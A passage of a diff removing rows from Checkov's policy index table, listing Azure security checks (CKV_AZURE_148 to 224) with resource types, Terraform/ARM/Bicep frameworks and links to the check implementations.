-| 1883 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) |
-| 1884 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
-| 1885 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
-| 1886 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
-| 1887 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
-| 1888 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) |
-| 1889 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) |
-| 1890 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) |
-| 1891 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) |
-| 1892 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) |
-| 1893 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) |
-| 1894 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) |
-| 1895 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) |
-| 1896 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) |
-| 1897 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) |
-| 1898 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) |
-| 1899 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) |
-| 1900 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) |
-| 1901 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) |
-| 1902 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) |
-| 1903 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) |
-| 1904 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) |
-| 1905 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1906 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1907 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1908 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
-| 1909 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) |
-| 1910 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) |
-| 1911 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) |
-| 1912 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) |
-| 1913 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) |
-| 1914 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) |
-| 1915 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) |
-| 1916 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) |
-| 1917 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. 
| Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | -| 1918 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1919 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | -| 1920 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | -| 1921 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | -| 1922 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | -| 1923 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | -| 1924 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | 
[APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | -| 1925 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | -| 1926 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | -| 1927 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | -| 1928 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1929 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | -| 1930 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1931 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | 
[LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | -| 1932 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1933 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1934 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1935 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | -| 1936 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | -| 1937 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | -| 1938 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1939 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | -| 1940 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | -| 1941 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | -| 1942 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | -| 1943 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | -| 1944 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | -| 1945 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | -| 1946 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | -| 1947 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | -| 1948 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | -| 1949 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | -| 1950 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | -| 1951 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | -| 1952 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | -| 1953 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | -| 1954 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | -| 1955 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | -| 1956 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | -| 1957 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | -| 1958 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | -| 1959 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | -| 1960 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | -| 1961 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | -| 1962 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | -| 1963 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | -| 1964 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | -| 1965 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | -| 1966 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | -| 1967 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | -| 1968 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | -| 1969 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | -| 1970 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1971 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1972 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | -| 1973 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1974 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | -| 1975 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | -| 1976 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 1977 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | 
Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 1978 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | -| 1979 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | -| 1980 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | -| 1981 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | -| 1982 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | -| 1983 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1984 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | 
Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1985 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1986 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | -| 1987 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1988 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | -| 1989 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | -| 1990 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | 
